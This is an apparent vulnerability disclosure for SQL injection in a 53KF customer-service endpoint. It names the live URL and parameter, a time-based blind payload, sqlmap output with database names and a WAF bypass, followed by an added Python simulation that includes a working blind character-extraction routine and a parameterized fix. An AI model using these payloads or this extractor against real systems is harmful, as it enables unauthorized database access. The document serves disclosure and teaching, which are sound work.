SQL injection in the 53KF customer-service system (official test)

- CVSS vector: AV AC AU C I A (scores not shown on the page)
- Published: 2025-04-13
- Revised: 2025-04-13

### Summary: as the title says

### Details:

53KF's customer-service system has a SQL injection. Last night your server had a WAF, which I managed to get past with some effort; this morning I found it was gone. Strange.

www5.53kf.com/fenci/robot_fenci.php?cmd=CR&com_id=72000079&robot_id=971b5d68cdd2d141e86978b8afa02f21&q_id=1e278e4878dc8de61694c69482d20b6d&val=4

The com_id parameter is injectable.

```
Place: GET
Parameter: com_id
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: cmd=CR&com_id=72000079' AND SLEEP(5) AND 'SvIC'='SvIC&robot_id=971b5d68cdd2d141e86978b8afa02f21&q_id=1e278e4878dc8de61694c69482d20b6d&val=4
---
[10:10:24] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
[10:10:24] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www5.53kf.com'
```

```
available databases [4]:
[*] information_schema
[*] ip
[*] talk
[*] test
```

The corresponding database has 234 tables; blind injection is too slow.

### Proof of vulnerability:

53KF's customer-service system has a SQL injection. Last night your server had a WAF, which I managed to get past with some effort; this morning I found it was gone. Strange.

www5.53kf.com/fenci/robot_fenci.php?cmd=CR&com_id=72000079&robot_id=971b5d68cdd2d141e86978b8afa02f21&q_id=1e278e4878dc8de61694c69482d20b6d&val=4

The com_id parameter is injectable.

```
Place: GET...
```
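What the sqlmap output above is actually measuring, as an added example that is not part of the original report and not 53KF's code: a simulation of the time-based blind injection on `com_id`. It uses an in-memory SQLite database as a stand-in for MySQL, with `SLEEP()` emulated by a registered function (SQLite has none; the delay unit is scaled down so the demo finishes in seconds), a hypothetical `company` table with constructed data, the same `' AND SLEEP(n) AND 'SvIC'='SvIC` payload shape as the report, a binary-search character extraction that shows why dumping 234 tables this way is slow, and a parameterized version of the query that the payload cannot influence. The `CASE`/`unicode`/`substr` spelling is SQLite's equivalent of MySQL's `IF`/`ASCII`/`SUBSTRING`; the actual query inside robot_fenci.php is not known and is assumed to concatenate the parameter.

```python
"""Added example (not 53KF's code): time-based blind SQL injection on a com_id
parameter, simulated against SQLite with an emulated SLEEP()."""
import sqlite3
import time

# One SLEEP(1) unit in seconds. Scaled down so the demo runs in seconds,
# not minutes; a real target would block for the full n seconds.
DELAY = 0.1


def make_db():
    """Hypothetical schema standing in for the real backend (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE company (com_id TEXT, name TEXT)")
    conn.execute("INSERT INTO company VALUES ('72000079', 'demo')")

    def sleep(n):
        # MySQL's SLEEP(n) blocks for n seconds and returns 0; emulate that.
        time.sleep(n * DELAY)
        return 0

    conn.create_function("SLEEP", 1, sleep)
    return conn


def vulnerable_lookup(conn, com_id):
    """The pattern the report implies: the parameter is concatenated into SQL."""
    sql = "SELECT name FROM company WHERE com_id = '%s'" % com_id
    return conn.execute(sql).fetchall()


def hardened_lookup(conn, com_id):
    """Fix: bind com_id as a parameter, so quotes and SLEEP() are only data."""
    sql = "SELECT name FROM company WHERE com_id = ?"
    return conn.execute(sql, (com_id,)).fetchall()


def _timed(lookup, conn, com_id):
    """Seconds the lookup took; a syntax error from a broken payload is 'no delay'."""
    start = time.monotonic()
    try:
        lookup(conn, com_id)
    except sqlite3.Error:
        pass
    return time.monotonic() - start


def is_time_based_injectable(lookup, conn, base="72000079", units=5):
    """sqlmap-style check: does the SLEEP() payload measurably delay the response?"""
    payload = base + "' AND SLEEP(%d) AND 'SvIC'='SvIC" % units
    return _timed(lookup, conn, payload) >= units * DELAY * 0.5


def extract_blind(conn, expr, length, base="72000079"):
    """Recover `expr` (a server-side SQL expression) one character at a time,
    binary-searching each code point on whether a SLEEP(1) delay occurred.
    About 7 requests per character, each true branch costing a full sleep:
    this is why dumping a large schema through time-based blind injection is slow."""
    result = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126  # printable ASCII range
        while lo < hi:
            mid = (lo + hi) // 2
            # SQLite spelling of MySQL's IF(ASCII(SUBSTRING(expr,pos,1))>mid, SLEEP(1), 0)
            cond = "unicode(substr((%s),%d,1))>%d" % (expr, pos, mid)
            payload = base + "' AND (CASE WHEN %s THEN SLEEP(1) ELSE 0 END) AND 'a'='a" % cond
            if _timed(vulnerable_lookup, conn, payload) >= DELAY * 0.5:
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


if __name__ == "__main__":
    db = make_db()
    print("vulnerable endpoint delays:", is_time_based_injectable(vulnerable_lookup, db))
    print("hardened endpoint delays:  ", is_time_based_injectable(hardened_lookup, db))
    print("extracted:", extract_blind(db, "(SELECT name FROM company LIMIT 1)", 4))
```

The hardened lookup returns no rows for the injected value and never calls `SLEEP()`, which is the behaviour to confirm after the fix: the same sqlmap payload should produce no measurable delay. Note that the WAF the reporter saw is not a fix; the query must stop concatenating the parameter.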

No Exp or PoC available
Currently 0 affected product entries